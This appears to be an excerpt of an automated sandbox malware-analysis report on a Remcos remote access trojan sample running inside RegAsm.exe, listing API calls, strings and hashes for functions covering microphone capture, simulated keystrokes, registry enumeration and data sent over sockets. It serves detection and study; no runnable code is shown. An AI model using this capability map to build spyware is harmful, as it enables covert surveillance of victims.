                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                • waveInStart.WINMM ref: 00401CFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                • String ID: dMG$p54$|MG
                                                                                • API String ID: 1356121797-346803825
                                                                                • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                  • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                  • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                • DispatchMessageA.USER32 ref: 0041D584
                                                                                • GetMessageA.USER32 ref: 0041D591
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                • String ID: Remcos
                                                                                • API String ID: 1970332568-165870891
                                                                                • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                • __freea.LIBCMT ref: 00454083
                                                                                • __freea.LIBCMT ref: 0045408F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                • String ID:
                                                                                • API String ID: 201697637-0
                                                                                • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                                • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                                • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                • _free.LIBCMT ref: 00445515
                                                                                • _free.LIBCMT ref: 0044552E
                                                                                • _free.LIBCMT ref: 00445560
                                                                                • _free.LIBCMT ref: 00445569
                                                                                • _free.LIBCMT ref: 00445575
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                • String ID: C
                                                                                • API String ID: 1679612858-1037565863
                                                                                • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tcp$udp
                                                                                • API String ID: 0-3725065008
                                                                                • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                • ExitThread.KERNEL32 ref: 004018F6
                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                • String ID: PkG$XMG$NG$NG
                                                                                • API String ID: 1649129571-3151166067
                                                                                • Opcode ID: 8706ddbe36d9a0f1e6bf25ec99417fc645fb4de6b160676aa5446362c8e4167c
                                                                                • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                • Opcode Fuzzy Hash: 8706ddbe36d9a0f1e6bf25ec99417fc645fb4de6b160676aa5446362c8e4167c
                                                                                • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                                                • MoveFileW.KERNEL32 ref: 00407AA5
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                • String ID: .part
                                                                                • API String ID: 1303771098-3499674018
                                                                                • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                APIs
                                                                                  • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                  • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                  • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                • _wcslen.LIBCMT ref: 0041B7F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                • String ID: .exe$8SG$http\shell\open\command$p54$program files (x86)\$program files\
                                                                                • API String ID: 3286818993-2881460799
                                                                                • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                APIs
                                                                                • AllocConsole.KERNEL32 ref: 0041CE35
                                                                                • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Console$Window$AllocOutputShow
                                                                                • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                                                • API String ID: 4067487056-3820604032
                                                                                • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-4CT19T$p54$34
                                                                                • API String ID: 0-147987875
                                                                                • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                APIs
                                                                                • SendInput.USER32 ref: 00419A25
                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                  • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InputSend$Virtual
                                                                                • String ID:
                                                                                • API String ID: 1167301434-0
                                                                                • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __freea$__alloca_probe_16_free
                                                                                • String ID: a/p$am/pm$h{D
                                                                                • API String ID: 2936374016-2303565833
                                                                                • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                APIs
                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                • _free.LIBCMT ref: 00444E87
                                                                                • _free.LIBCMT ref: 00444E9E
                                                                                • _free.LIBCMT ref: 00444EBD
                                                                                • _free.LIBCMT ref: 00444ED8
                                                                                • _free.LIBCMT ref: 00444EEF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$AllocateHeap
                                                                                • String ID: KED
                                                                                • API String ID: 3033488037-2133951994
                                                                                • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                APIs
                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Enum$InfoQueryValue
                                                                                • String ID: [regsplt]$xUG$TG
                                                                                • API String ID: 3554306468-1165877943
                                                                                • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                                                • __fassign.LIBCMT ref: 0044B4F9
                                                                                • __fassign.LIBCMT ref: 0044B514
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                                                • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                • __fassign.LIBCMT ref: 1000954F
                                                                                • __fassign.LIBCMT ref: 1000956A
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                                                  • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                  • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                • String ID: xUG$NG$NG$TG
                                                                                • API String ID: 3114080316-2811732169
                                                                                • Opcode ID: 6d72fe2b66a30c91890655e11a730b6c52f749376543310d6eb36e2ea9a9b40e
                                                                                • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                • Opcode Fuzzy Hash: 6d72fe2b66a30c91890655e11a730b6c52f749376543310d6eb36e2ea9a9b40e
                                                                                • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                APIs
